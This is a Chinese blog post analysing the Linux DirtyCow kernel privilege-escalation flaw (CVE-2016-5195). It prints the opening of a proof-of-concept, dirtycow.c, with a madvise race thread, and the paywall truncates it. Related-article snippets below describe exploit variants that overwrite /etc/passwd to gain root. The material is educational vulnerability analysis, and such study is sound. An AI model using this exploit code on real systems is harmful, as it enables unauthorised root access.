DirtyCow漏洞分析

最新推荐文章于 2024-05-11 10:02:36 发布
最新推荐文章于 2024-05-11 10:02:36 发布
阅读量790 收藏 1
点赞数
分类专栏: LiveOverflow-binary hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/96771444
版权
本文深入分析了Linux内核的 DirtyCow 漏洞(CVE-2016-5195),该漏洞允许本地低权限用户通过条件竞争,获取只读内存映射的写权限,从而提升到root权限。通过展示PoC代码,解释了如何利用madvise和mmap等函数触发这个权限提升漏洞,以及如何通过/proc/self/mem文件进行内存修改。
摘要由CSDN通过智能技术生成

.
  漏洞编号:CVE-2016-5195, 该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。 这是一个Linux kernel的本地权限提升漏洞。这里通过一个实验来逐步分析这个漏洞。
  先来看一段poc代码:
dirtycow.c

#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;
 
void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  print
最低0.47元/天 解锁文章
Mandorr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dirtycow提权漏洞原理图
03-10
自己画的关于脏牛漏洞提权的原理图,个人感觉比较清晰,适合小白理解用
Linux(CVE-2016-5195)Dirty cow漏洞利用提权
最新发布
m0_73927535的博客
06-04 530
1、虚拟机 环境2、下载后解压 ,虚拟机打开二、信息收集1、查看kali本机IP<192.168.209.152>,进行本网段扫描2、扫描到有一个IP<192.168.209.154>,这个就是同网段靶机的IP。3、 扫描端口,发现开放了三个端口4、访问1898端口,本机或kali访问都可以。
探索 Dirty COW:一个安全领域的传奇漏洞
gitblog_00044的博客
05-11 371
探索 Dirty COW:一个安全领域的传奇漏洞 项目地址:https://gitcode.com/dirtycow/dirtycow.github.io 1、项目介绍 在信息技术的世界中,安全始终是至关重要的议题。Dirty COW(亦称“脏牛”)是一个著名的历史性Linux内核漏洞,它揭示了内存管理中一个潜在的严重问题。这个项目不仅提供了一个学习和理解系统安全性的窗口,还鼓励社区成员参与互动,...
Dirty COW漏洞原理与简单利用
热门推荐
Ray的博客
05-20 1万+
我将分为3个部分进行介绍,包括:漏洞的概述,漏洞的成因以及漏洞的利用。 首先是漏洞概述: Dirty COW漏洞是一种发生在写时复制的竞态条件漏洞,它影响所有基于Linux的操作系统,包括Android,这个漏洞2007年起就存在于Linux内核中,直到2016年才被发现和修复。可以利用这个漏洞修改受保护的文件,也可以利用这个漏洞提权。 Dirty COW漏洞是发生在写时复制的竞态条件漏洞,我们先看看什么是竞态条件和写时复制。 竞态条件是指一个系统或者进程的输出依赖于不受控制的事件出现顺序或者出现时
Linux核心再修补了安全漏洞 DirtyCOW修补不完全
自在过生活
12-05 709
尽管DirtyCOW已被修补一年,但资安业者Bindecy发现修补并不完全,第三方在未授权下可写入只读页面,影响应用程序表现,受影响版本包括Ubuntu、Fedora、SUSE等,Android及Red Hat则未受影响。 在Linux重大安全漏洞DirtyCOW(CVE-2016–5195)被修补的一年之后,资安业者Bindecy发现该修补程序并不完全,使得Linux核心的首席开
DirtyCow:适用于32位和64位的Dirtycow漏洞利用
04-29
脏牛适用于32位和64位的Dirtycow漏洞利用32位的用法示例$ gcc dc32.c -o cowroot -pthread $ ./cowroot $ echo 0> / proc / sys / vm / dirty_writeback_centisecs64位的用法示例$ gcc dc64.c -o cowroot -pthread $...
dirtycow
05-10
漏洞利用dirtycow漏洞的pokemon漏洞作为基础,并自动生成新的passwd行。 运行二进制文件时,系统将提示用户输入新密码。 然后将原始的/ etc / passwd文件备份到/tmp/passwd.bak,并用生成的行覆盖root帐户。 运行...
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
linux-DirtyCOW
08-13
“Linux-DirtyCOW”是Linux内核中的一个严重安全漏洞,全称为“Dirty Copy-on-Write”。这个漏洞在2016年被公开,影响了从2007年开始发布的多个Linux内核版本。它的存在允许本地恶意用户以非特权方式获取root权限,...
关于COW的问题
陈刚编程心得与知识集
02-12 913
copyonwrite这个写时复制的机制怎么才能绕过呢,我是在linux下,这方面是不是有关内核的啊?
宋宝华:谈一谈Linux写时拷贝(COW)的安全漏洞(1)
宋宝华
01-09 8121
COW技术,爆出了巨大的漏洞,让父子进程间可以向对方泄露写过的新数据,成为了Linux内核的惊天大瓜。
dirty cow 试验
vbaspdelphi的专栏
10-26 3173
dirty cow 解释 https://dirtycow.ninja/ 下面的链接里面有当前暴露出来的一些exploit利用工具 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs 手动测试了dirtyc0w.c和dirty_passwd_adjust_cow,没有效果 # 编译代码 gcc -pthread dirtyc0w.c -o
DirtyCow Linux权限提升漏洞分析
inquisiter
03-09 2008
DirtyCow Linux权限提升漏洞分析 如上图,这个漏洞的特点就是线程竞争导致可以读写的权限被扩大了。其实具体说可能有点绕,就是foll_write标志在row特性执行后去掉了,但是再次执行时却没有检查页表项的有效性,导致我们可以利用另一个线程清空页表。清空的页表由于没有了foll_write权限要求,再次被分配时就不执行row执行机制,导致原本不应该本写的地址拥有了写的权限。 ...
Docker逃逸--脏牛漏洞POC测试
07-25 1105
脏牛漏洞(CVE-2016-5195)与VDSO(虚拟动态共享对象) 一、漏洞描述 Dirty Cow(CVE-2016-5195)是Linux内核中的权限提升漏洞,源于Linux内核的内存子系统在处理写入时拷贝(copy-on-write, Cow)存在竞争条件(race condition),允许恶意用户提权获取其他只读内存映射的写访问权限。 竞争条件意为任务执行顺序异常,可能导致应...
脏牛(Dirty COW)漏洞攻击实验(SEED-Lab:Dirty-COW Attack Lab)
CTFwp笔记1-rsa基本知识+共模攻击
08-30 2602
​   该漏洞是Linux的一个本地提权漏洞,发现者是Phil Oester,影响>=2.6.22的所有Linux内核版本,修复时间是2016年10月18号。该漏洞是 Linux Kernel 中的条件竞争漏洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)机制存在的逻辑漏洞,完成对文件的越权读写。............
虚拟内存操作
weixin_50866517的博客
10-04 1249
操作会设置共享内存段的一个属性,而不是进程的属性,意味着分页一旦因故障被锁进了内存,那么即使所有进程都与这个共享内存段分离了,分页还是会保持驻留在内存中的状态。与之相反的是,使用 mlock()(或 mlockall())锁进内存的区域只有在还存在进程持有该区域上的锁时才会保持被锁进内存的状态。由于加锁操作的单位是分页,因此被锁住的区域的结束位置为大于 length 加 addr 的下一个分页边界。adr地址必须是分页对齐的,并且由于返回的信息是有关整个分页的,length分页大小的下一个整数倍。
linux提权之dirtycow
qq_62370574的博客
01-20 1067
漏洞是一种影响Linux操作系统的本地特权升级漏洞,其全称为"Copy-On-Write"(写时复制)漏洞。这个漏洞在2016年被公开,并且影响了大量的Linux内核版本。Dirty COW漏洞的根本原因是在Linux在竞态条件下的机制的实现存在缺陷。Copy-On-Write是一种内存管理技术,它允许多个进程共享同一个物理内存页面的副本,直到其中一个进程尝试修改该页面时,系统才会复制出一个新的页面供修改进程使用。是多个并发操作或线程访问共享资源时可能出现的一种问题。
inux性能分析及调优
JK198310的专栏
10-20 1149
linux性能分析及调优__cpu 性能瓶颈调优可调性能参数 、内存性能瓶颈可调性能参数(操作系统设置swap的目的、在写程序时、如何使自己的内存不被换出swap,常驻物理内存)、磁盘I/O可调性能参数(如何判断磁盘IO瓶颈,使用iostat -x 1)、网络可调性能参数   http://blog.163.com/xychenbaihu@yeah/blog/static/13222965520
dirtycow攻击原理和后果
04-29
Dirty COW(Copy-On-Write)攻击是一种针对Linux内核漏洞的攻击方式,该漏洞存在于2007年后发布的所有版本的Linux内核中。攻击者可以利用该漏洞获取权限并执行恶意操作。攻击者可以通过使用Dirty COW漏洞,绕过系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值